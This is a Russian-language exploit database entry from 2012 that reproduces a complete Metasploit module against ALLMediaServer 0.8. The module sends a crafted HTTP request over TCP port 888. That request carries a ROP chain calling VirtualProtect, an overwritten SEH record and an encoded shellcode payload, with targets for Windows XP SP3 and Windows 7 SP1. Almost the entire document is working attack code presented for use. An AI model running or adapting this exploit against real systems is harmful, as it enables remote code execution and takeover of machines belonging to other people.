ALLMediaServer 0.8 Buffer Overflow Exploit

Свойства

Дата публикации:
15.07.2012
Цель:
ALLMediaServer 0.8
Тип воздействия:
Компрометация системы

Код

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
#   http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
    Rank = NormalRanking

    include Msf::Exploit::Remote::Tcp
    include Msf::Exploit::Seh

    def initialize(info = {})
        super(update_info(info,
            'Name'           => 'ALLMediaServer 0.8 Buffer Overflow',
            'Description'    => %q{
                This module exploits a stack buffer overflow in ALLMediaServer 0.8.
                The vulnerability is caused due to a boundary error within the
                handling of HTTP request.
            },
            'License'        => MSF_LICENSE,
            'Author'         =>
                [
                    'motaz reda <motazkhodair[at]gmail.com>',    # Original discovery
                    'modpr0be <tom[at]spentera.com>',    # Metasploit module
                    'juan vazquez' # More improvement
                ],
            'References'     =>
                [
                    [ 'EDB', '19625' ]
                ],
            'DefaultOptions' =>
                {
                    'ExitFunction' => 'process', #none/process/thread/seh
                },
            'Platform'       => 'win',
            'Payload'        =>
                {
                    'BadChars' => "",
                    'Space' => 660,
                    'DisableNops' => true
                },

            'Targets'        =>
                [
                    [ 'ALLMediaServer 0.8 / Windows XP SP3 - English',
                        {
                            'Ret'       =>    0x65ec74dc, # ADD ESP,6CC # POP # POP # POP # RET - avcoded-53.dll
                            'OffsetRop' =>    696,
                            'jmp'       =>    264,
                            'Offset'    =>    1072
                        }
                    ],
                    [ 'ALLMediaServer 0.8 / Windows 7 SP1 - English',
                        {
                            'Ret'       =>    0x65ec74dc, # ADD ESP,6CC # POP # POP # POP # RET - avcoded-53.dll
                            'OffsetRop' =>    332,
                            'jmp'       =>    628,
                            'Offset'    =>    1072
                        }
                    ],
                ],
            'Privileged'     => false,
            'DisclosureDate' => 'Jul 04 2012',
            'DefaultTarget'  => 1))

        register_options([Opt::RPORT(888)], self.class)

    end

    def junk(n=1)
        return [rand_text_alpha(4).unpack("L")[0]] * n
    end

    def nops(rop=false, n=1)
        return rop ? [0x665a0aa1] * n : [0x90909090] * n
    end

    def asm(code)
        Metasm::Shellcode.assemble(Metasm::Ia32.new, code).encode_string
    end

    def exploit
        #with help from mona :)
        rop = [
            nops(true, 12),  #ROP NOP
            0x65f6faa7,      # POP EAX # RETN
            0x671ee4e0,      # ptr to &VirtualProtect()
            0x6ac1ccb4,      # MOV EAX,DWORD PTR DS:[EAX] # RETN
            0x667ceedf,      # PUSH EAX # POP ESI # POP EDI # RETN
            junk,
            0x65f5f09d,      # POP EBP # RETN
            0x65f9830d,      # & call esp
            0x6ac1c1d5,      # POP EBX # RETN
            0x00000600,      # 0x00000320-> ebx
            0x6672a1e2,      # POP EDX # RETN
            0x00000040,      # 0x00000040-> edx
            0x665a09df,      # POP ECX # RETN
            0x6ad58a3d,      # &Writable location
            0x6ac7a771,      # POP EDI # RETN
            nops(true),      # RETN (ROP NOP)
            0x6682f9f4,      # POP EAX # RETN
            nops,            # nop
            0x663dcbd2       # PUSHAD # RETN
        ].flatten.pack("V*")

        connect

        buffer = rand_text(target['OffsetRop'])    #junk
        buffer << rop
        buffer << asm("jmp $+0x#{target['jmp'].to_s(16)}") # jmp to payload
        buffer << rand_text(target['Offset'] - buffer.length)
        buffer << generate_seh_record(target.ret)
        buffer << payload.encoded

        print_status("Sending payload to ALLMediaServer on #{target.name}...")
        sock.put(buffer)

        disconnect

    end
end

или введите имя

CAPTCHA